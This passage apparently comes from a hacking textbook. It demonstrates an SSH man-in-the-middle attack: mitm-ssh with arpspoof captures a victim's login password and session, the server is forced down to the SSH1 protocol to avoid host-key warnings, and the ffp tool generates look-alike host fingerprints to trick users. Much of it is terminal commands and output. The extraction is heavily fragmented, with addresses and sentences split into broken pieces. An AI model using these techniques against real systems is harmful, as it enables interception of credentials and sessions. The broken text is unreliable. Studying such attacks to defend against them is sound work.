SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt
[MITM] Connection from UNKNOWN:1929 closed
reader@hacking:~ $ ls /usr/local/var/log/mitm-ssh/
passwd
...
168
...
250:1929 <- 192
...
42
...
168
...
250:1929 -> 192
...
42
...
log
[2007-10-01 13:33:42] MITM (SSH2) 192
...
42
...
168
...
72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt
reader@hacking:~ $ cat /usr/local/var/log/mitm-ssh/ssh2*
Last login: Mon Oct 1 06:32:37 2007 from 192
...
42
...
6
...
bash_logout
...
bashrc
...
swp
...
In addition, the data
transmitted during the connection is captured, showing the attacker everything
the victim did during the SSH session
...
SSL and SSH were designed with this in mind and have
protections against identity spoofing
...
If the attacker doesn't have the proper certificate
or fingerprint for B when A attempts to open an encrypted communication
channel with the attacker, the signatures won't match and A will be alerted with a
warning
...
168
...
250 (tetsuo) had never previously
communicated over SSH with 192
...
42
...
The host fingerprint that it accepted was actually the fingerprint
generated by mitm-ssh
...
168
...
250 (tetsuo) had a host
fingerprint for 192
...
42
...
168
...
72
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed
...

Please contact your system administrator
...
ssh/known_hosts to get rid of this message
...
ssh/known_hosts:1
RSA host key for 192
...
42
...

Host key verification failed
...
However, many Windows SSH clients don't
have the same kind of strict enforcement of these rules and will present the user
with an "Are you sure you want to continue?" dialog box
...

Differing SSH Protocol Host Fingerprints
SSH host fingerprints do have a few vulnerabilities
...

Usually, the first time an SSH connection is made to a new host, that host's
fingerprint is added to a known_hosts file, as shown here:
iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
...
168
...
72' (RSA) to the list of known hosts
...
168
...
72's password:
iz@tetsuo:~ $ grep 192
...
42
...
ssh/known_hosts
192
...
42
...

iz@tetsuo:~ $ rm ~/
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)? no
Host key verification failed
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)? no
Host key verification failed
...
168
...
72 22
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
99-OpenSSH_3
...

iz@tetsuo:~ $ telnet 192
...
42
...
168
...
1
...
168
...
1
...

SSH-2
...
3p2 Debian-8ubuntu1

Connection closed by foreign host
...
168
...
72 (loki) includes the string SSH-1
...
Often, the SSH
server will be configured with a line like Protocol 2,1, which also means the
server speaks both protocols and tries to use SSH2 if possible
...

In contrast, the banner from 192
...
42
...
0, which
shows that the server only speaks protocol 2
...

The same is true for loki (192
...
42
...
It's unlikely that a client will have used
SSH1, so it probably doesn't have the host fingerprints for this protocol yet
...
Instead
of being presented with a lengthy warning, the user will simply be asked to add
the new fingerprint
...
By adding the line Protocol 1 to
/usr/local/etc/mitm-ssh_config, the mitm-ssh daemon will claim it only speaks the
SSH1 protocol
...

From 192
...
42
...
168
...
72 22
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
99-OpenSSH_3
...

iz@tetsuo:~ $ rm ~/
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192
...
42
...

jose@192
...
42
...
log
# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh
# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-ssh
Protocol 1

reader@hacking:~ $ mitm-ssh 192
...
42
...
168
...
72:22
SSH MITM Server listening on 0
...
0
...

Generating 768 bit RSA key
...

Now Back on 192
...
42
...
168
...
72 22
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
5-OpenSSH_3
...

Usually, clients such as tetsuo connecting to loki at 192
...
42
...
Therefore, there would only be a host fingerprint
for SSH protocol 2 stored on the client
...
Older implementations will simply ask to add this
fingerprint since, technically, no host fingerprint exists for this protocol
...

iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6
...
168
...
72
WARNING: RSA key found for host 192
...
42
...
ssh/known_hosts:1
RSA key fingerprint ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
...
168
...
72 (192
...
42
...

RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6
...
Also, since not all clients will be up to date, this
technique can still prove to be useful for an MitM attack
...
Often, a
user will connect to a server from several different clients
...
While no one actually memorizes the entire fingerprint, major
changes can be detected with little effort
...
If an MitM attack is attempted, the blatant difference
in host fingerprints can usually be detected by eye
...
Certain fingerprints will look very
similar to others
...

Usually, the hex digits found at the beginning and end of the fingerprint are
remembered with the greatest clarity, while the middle tends to be a bit hazy
...

The openssh package provides tools to retrieve the host key from servers
...
168
...
72 > loki
...
168
...
72 SSH-1
...
9p1
reader@hacking:~ $ cat loki
...
168
...
72 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA8Xq6H28EOiCbQaFbIzPtMJSc316SH4aOijgkf7nZnH4LirNziH5upZmk4/
JSdBXcQohiskFFeHadFViuB4xIURZeF3Z7OJtEi8aupf2pAnhSHF4rmMV1pwaSuNTahsBoKOKSaTUOW0RN/1t3G/
52KTzjtKGacX4gTLNSc8fzfZU=
reader@hacking:~ $ ssh-keygen -l -f loki
...
168
...
72
reader@hacking:~ $

Now that the host key fingerprint format is known for 192
...
42
...
A program that does this has been
developed by Rieck and is available at http://www
...
org/thc-ffp/
...
168
...
72 (loki)
...

Colon-separated: 01:23:45:67
...

-k type Specify type of key to calculate [Default: rsa]
Available: rsa, dsa
-b bits Number of bits in the keys to calculate [Default: 1024]
-K mode Specify key calulation mode [Default: sloppy]
Available: sloppy, accurate
-m type Specify type of fuzzy map to use [Default: gauss]
Available: gauss, cosine
-v variation Variation to use for fuzzy map generation [Default: 7
...
14]
-l size Size of list that contains best fingerprints [Default: 10]
-s filename Filename of the state file [Default: /var/tmp/ffp
...
state present, specify a target hash
...
83% | 9
...
52% | 7
...
49% | 5
...
74% | 3
...
25% | 2
...
05% | 1
...
12% | 0
...
47% | 0
...
09% | 0
...
00% | 0
...
19% | 0
...
65% | 0
...
39% | 1
...
41% | 3
...
71% | 4
...
29% | 6
...
prime: Yes
Generation Mode: Sloppy

State File: /var/tmp/ffp
...

---[Current State]-------------------------------------------------------------
Running: 0d 00h 00m 00s | Total: 0k hashs | Speed: nan hashs/s
-------------------------------------------------------------------------------
Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
652482%

---[Current State]-------------------------------------------------------------
Running: 0d 00h 01m 00s | Total: 7635k hashs | Speed: 127242 hashs/s
-------------------------------------------------------------------------------
Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
471931%
---[Current State]-------------------------------------------------------------
Running: 0d 00h 02m 00s | Total: 15370k hashs | Speed: 128082 hashs/s
-------------------------------------------------------------------------------
Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
471931%

...

---[Current State]-------------------------------------------------------------
Running: 1d 05h 06m 00s | Total: 13266446k hashs | Speed: 126637 hashs/s
-------------------------------------------------------------------------------
Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
158321%
--------------------------------------------------------------------------------

Exiting and saving state file /var/tmp/ffp
...
The
program keeps track of some of the best fingerprints and will display them
periodically
...
state, so the
program can be exited with a CTRL-C and then resumed again later by simply
running ffp without any arguments
...

reader@hacking:~ $ ffp -e -d /tmp
---[Restoring]-----------------------------------------------------------------
Reading FFP State File: Done
Restoring environment: Done
Initializing Crunch Hash: Done
-------------------------------------------------------------------------------
Saving SSH host key pairs: [00] [01] [02] [03] [04] [05] [06] [07] [08] [09]
reader@hacking:~ $ ls /tmp/ssh-rsa*
/tmp/ssh-rsa00 /tmp/ssh-rsa02
...
pub
/tmp/ssh-rsa00
...
pub /tmp/ssh-rsa08
/tmp/ssh-rsa01 /tmp/ssh-rsa03
...
pub
/tmp/ssh-rsa01
...
pub /tmp/ssh-rsa09
/tmp/ssh-rsa02 /tmp/ssh-rsa04
...
pub
reader@hacking:~ $

In the preceding example, 10 public and private host key pairs have been
generated
...

reader@hacking:~ $ for i in $(ls -1 /tmp/ssh-rsa*
...
pub
1024 ba:06:7f:12:bd:8a:5b:5c:eb:dd:93:ec:ec:d3:89:a9 /tmp/ssh-rsa01
...
pub

1024 ba:06:49:d4:b9:d4:96:4b:93:e8:5d:00:bd:99:53:a0 /tmp/ssh-rsa03
...
pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05
...
pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07
...
pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09
...
/loki
...
168
...
72
reader@hacking:~ $

From the 10 generated key pairs, the one that seems to look the most similar can
be determined by eye
...
pub, shown in bold, was chosen
...

This new key can be used with mitm-ssh to make for an even more effective
attack
...
Since we need to remove the Protocol 1 line we
added earlier, the output below simply overwrites the configuration file
...
168
...
72 -v -n -p 2222
Using static route to 192
...

42
...
Could not load host key
SSH MITM Server listening on 0
...
0
...

In another terminal window, arpspoof is running to redirect the traffic to mitm-ssh, which will use the new host key with the fuzzy fingerprint
...

Normal Connection
iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)?

Can you immediately tell the difference? These fingerprints look similar enough to
trick most people into simply accepting the connection
...
A file containing all the
passwords in plaintext form would be far too attractive a target, so instead, a one-way hash function is used
...

NAME
crypt - password and data encryption
SYNOPSIS
#define _XOPEN_SOURCE
#include ...
It is based on the Data
Encryption Standard algorithm with variations intended (among other
things) to discourage use of hardware implementations of a key search
...

salt is a two-character string chosen from the set [a-zA-Z0-9
...

This is a one-way hash function that expects a plaintext password and a salt value
for input, and then outputs a hash with the salt value prepended to it
...
Writing a quick program to experiment
with this function will help clarify any confusion
...
c
#define _XOPEN_SOURCE
#include <unistd.h>
